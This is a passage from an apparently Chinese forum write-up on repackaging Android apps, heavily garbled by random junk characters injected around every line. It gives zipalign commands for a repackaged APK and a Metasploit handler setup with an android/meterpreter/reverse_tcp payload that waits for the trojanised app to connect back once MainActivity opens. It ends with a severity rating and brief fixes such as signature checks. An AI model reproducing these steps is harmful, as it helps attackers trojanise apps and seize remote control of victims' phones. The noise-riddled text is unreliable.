$ s1 c; R0 ~- r! O+ x1 |7 ?. ?' c: b) k* ^ N 对齐 8 Z( R+ E8 V2 n Y " q4 n( ]& a9 i! ~* x9 B6 H$ Y

. v* L, z: O0 D q2 X9 ]# {9 N8 _; z- v8 e7 a% y: d O8 `: H 字节对齐优化 8 v p( c6 O. e7 E" ~) N* [: i) I. q% v/ W" ?9 o

' P$ B. P* A7 R9 x+ o % `* h5 ~3 B' Y& F" r zipalign -v 4 repackaged.apk final.apk # B2 i+ L& C4 e: x2 O) ~ + u5 a# [1 `2 E: i8 D9 {9 D

! Q) H1 F) j3 r 3 A `1 J) {, J+ A: v- s" i+ V 检查是否对齐 / s- O, S/ B4 @& D1 z( S1 o- o . ] v3 G( m. ^7 N3 c

% ]3 x6 F. m& a% i 0 F. r+ I& f$ f8 Y zipalign -c -v 4 final.apk ! T9 U M+ Y' D2 M- ?- { / z8 M( V6 q% N* U5 d0 O/ e6 l9 s

# a/ v% z8 R. X+ Y 8 T0 z% T! ~( {/ S6 | 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 1 h- T3 z, k/ ^$ p+ B R 5 s5 I1 ^4 C3 ` W, L

5 U( r2 P% U1 R+ P+ \ | , J& y8 E; v# W 启动Metasploit控制台，配置参数等待上线 ) T9 h* _# `2 Q/ q) _! \5 c# a/ _

' I( k9 Q" I+ ? _! S * o6 l) h3 v; {( E 在终端依次输入如下命令 , Y" s$ i9 O5 X- K$ i/ o" X " |$ K5 f7 v: l7 [! c

/ f' s9 K8 n# I% d s+ V & m3 U) Q+ \: q: ~ msfconsole 4 e! B7 u8 k! B# i9 W5 \$ T# G) E ^" }% }. p' H

, c5 G% c% m2 _4 ?0 x' f# K) r) G2 d( Y% w2 Y% m% X$ U8 v use exploit/multi/handler 1 S& J* O0 z! z: b) F: L& x5 e4 \! h# [# j

+ @0 W8 K9 j+ e) D( W: v4 P& y7 x+ H! S0 z- X2 L. U! l) m set PAYLOAD android/meterpreter/reverse_tcp 7 W! v+ M8 r, Y; Z ( r' z4 ^- M5 t! d3 v0 o

! N8 W# K( y7 M* j8 c, N W* O$ K6 O/ I0 Q3 p2 s/ E d9 p# l set LHOST 192.xxx.xx.xx $ L5 Q3 Z ^" f% x3 A 3 S; S$ b6 i. J% l9 S7 J

9 k( N1 D. g4 I* j ~ 6 R- j7 J$ \( e( b5 [; W4 M set LPORT 4444 7 Q) p* X& ^6 S' t* N ; x# D q) F- q; S

% r7 c$ l, F, s; G! J3 O& x3 S& o# w 6 J& D! ]; }+ x2 D, b exploit " h5 n2 K5 M3 t6 K P8 r4 ]) r7 |7 s+ H2 _

+ Z2 A! E# a" t8 }6 a) `& d \8 J' \, [! l5 ~ 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 3 Q ]) f& Y2 v& T4 | 0 H$ @7 _% c# v

% d- x5 Z1 h3 f# i7 d9 w* r9 y5 h' j6 N' e w( ?) y7 w0 Z 漏洞危害：中 $ E: T- O; J0 _/ E) y9 U7 R 2 a8 k5 v: a% ~, E8 l+ h" Y' {

- w+ Y' L+ y: ~( k ( ~% \|, m& g+ m* {& ` 1 _2 G. `4 Q. J8 ~7 @! ^0 I0 }% r 1 w$ U0 z* B: D7 J* o2 ^6 F# d 严重程度 - J5 x( M$ \' h z6 `2 n4 [" z6 M 5 T" k& A6 P1 H7 n/ E% }' E, Y % E4 P6 @) f0 _" k4 X* X k	# H1 x, X( H8 C2 X& d8 ~ 3 M; I7 A4 h) p" W) B0 p ( A9 }8 Q5 m! J+ k- P3 Z* P: f- Q$ J4 e: T( {6 ? 高 - t" C# j) C0 k1 K; u' U% F7 u 4 p l9 n# D" ^- z2 s ; o5 H4 O% X* H* @ + f# O& b7 v: `$ r6 T1 }) K' p	3 \|5 ?& s1 k5 I/ U % a% p8 \5 j: m/ t8 i : c4 \3 j/ h5 H: C& ^ - `$ [/ E* F& F) C ■ & z* X/ f6 b4 S+ S0 O e- ^7 x $ B7 X' Z5 R$ i3 n $ l8 n9 m# h1 G; h4 ~: M( D7 {- Y3 G: `4 b' x4 m	3 K4 Q4 A2 O1 D5 l8 a! N/ y3 b* B/ T ' f! Z: Z1 x5 `* x 7 S( ^0 n. C3 ~, ^& V. \) C- e( \|8 q& d) d9 Z 中 ! Q2 }& E7 r+ l( _% W" A % K; C! q* J& S3 l* l& t 4 j6 b: h, }1 v" f9 b- Z0 S- t + V o' Z# b* }) L! x _	8 E6 Y- h& O0 \: `8 s 5 R2 _* R+ K, N' H: b 9 y K- Q; j. r* V3 d0 d) z) ?& O W1 a ( e+ R& O- U$ e4 k( n# K" ~5 G" }. S2 l: G, U1 M6 Q; I : g" l8 V: C& u. M8 f1 m% E; c/ f/ ~ O( ]5 P : D- R& s# d J& U: F$ ?/ D" s, a( W2 U	/ p( D) Z9 c: } W& b6 C% g) N3 l% A. q; B) z2 `9 F* }0 {, _; ] + c* w9 s+ O% ? P( A7 v4 t 2 C4 l# T3 v4 F8 S; N6 Y2 N! I# d 低 8 G( c! K$ [# j- j+ p ' d \|, ^+ ]4 S8 `9 z , i. x; D2 N* I# O! ~" t" o3 g% V" q2 Z3 K$ U1 A9 M7 _/ V/ l$ }	, a* n4 g0 }- P9 o7 p: a6 c ' {0 F5 i/ C8 C/ j 7 z$ g1 b# e& n( Y" q" V 7 L* z: X' L# _ U3 `. P0 ` ) ]. q, t2 b' _( `5 J- z - p n& S- ? c ! _0 w6 u/ @3 E7 u& S 2 a! i5 G1 X# {+ w. R4 p & y, t: s: {* c " O. m/ V# G/ C/ H

/ T: o) k& ^5 N# u4 ?# Q$ D$ j+ ?7 A$ X$ Z/ L , @" Z* V' R9 f3 y 4 g* D: X# Y& _2 }

( q* Z$ l3 d) h2 }& ]- I( A / ]! o3 T$ J, H+ O" X' K: n# | 修复方法： . d- I! u, R3 o. b; t) G- B& ~1 r% Q. r& y8 r

7 {/ a# @7 f+ ~1 N' v: F 6 w# _( B; ^. S 1.在 APP 启动时应做签名校验防止二次打包。
& }4 A% ^' f! w6 i+ H3 H1 _7 s 3 T4 e, V4 k0 g3 S- k6 i 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 1 I+ ^- D2 n a: [0 A Q2 Q% _ / }5 F. I* }2 _. l5 S

9 U5 s! z& m9 `# D1 X ( o% ^* O& ]% Z- S+ i6 t % H! \% A' j3 E$ N ) h# i8 M8 l0 a G, \0 R" k" y

! x. R, p; s; e+ Z& l* Z . w0 |( s7 x5 \4 e- R0 c5 d5 i
6 \( }7 S% a% q% c 6 y0 x* G- X+ o: j

		自动登录	找回密码
密码			立即注册